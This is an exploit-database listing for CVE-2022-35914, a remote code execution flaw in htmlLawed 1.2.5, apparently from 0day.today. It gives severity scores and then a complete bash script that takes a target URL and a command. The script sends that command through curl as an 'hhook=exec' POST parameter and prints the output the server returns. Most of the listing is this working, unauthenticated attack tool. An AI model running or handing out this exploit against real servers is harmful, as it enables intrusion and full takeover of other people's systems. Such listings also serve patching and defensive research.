htmlLawed 1.2.5 - Remote Code Execution Exploit

2024-05-1900:00:00

Miguel Redondo

0day.today

htmllawed

remote code execution

rce

exploit

vendor

version

linux

cve-2022-35914

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7 High

AI Score

Confidence

Low

0.974 High

EPSS

Percentile

99.9%

JSON

# Exploit Title: htmlLawed 1.2.5 - Remote Code Execution (RCE)
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
# Software Link: https://github.com/kesar/HTMLawed
# Version: <= 1.2.5
# Tested on: Linux
# CVE: CVE-2022-35914

banner(){
  echo "  ______     _______     ____   ___ ____  ____      _________  ___  _ _  _"
  echo " / ___\ \   / / ____|   |___ \ / _ \___ \|___ \    |___ / ___|/ _ \/ | || |"
  echo "| |    \ \ / /|  _| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_"
  echo "| |___  \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__   _|"
  echo " \____|  \_/  |_____|   |_____|\___/_____|_____|   |____/____/  /_/|_|  |_|"
}

while getopts ":u:c:" arg; do
  case $arg in
    u) URL=$OPTARG; let parameter_counter+=1 ;;
    c) CMD=$OPTARG; let parameter_counter+=1 ;;
  esac
done


if [ -z "$URL" ] || [ -z "$CMD" ]; then
  banner
  echo -e "\n[i] Usage: ${0} -u <URL> -c <CMD>\n"
  exit
else
  banner
  echo -e "\n[+] Command output:"
fi

curl -s -d "sid=foo&hhook=exec&text=${CMD}" -b "sid=foo" ${URL} | egrep '\&nbps; \[[0-9]+\] =\>'| sed -E 's/\&nbps; \[[0-9]+\] =\> (.*)<br \/>/\1/'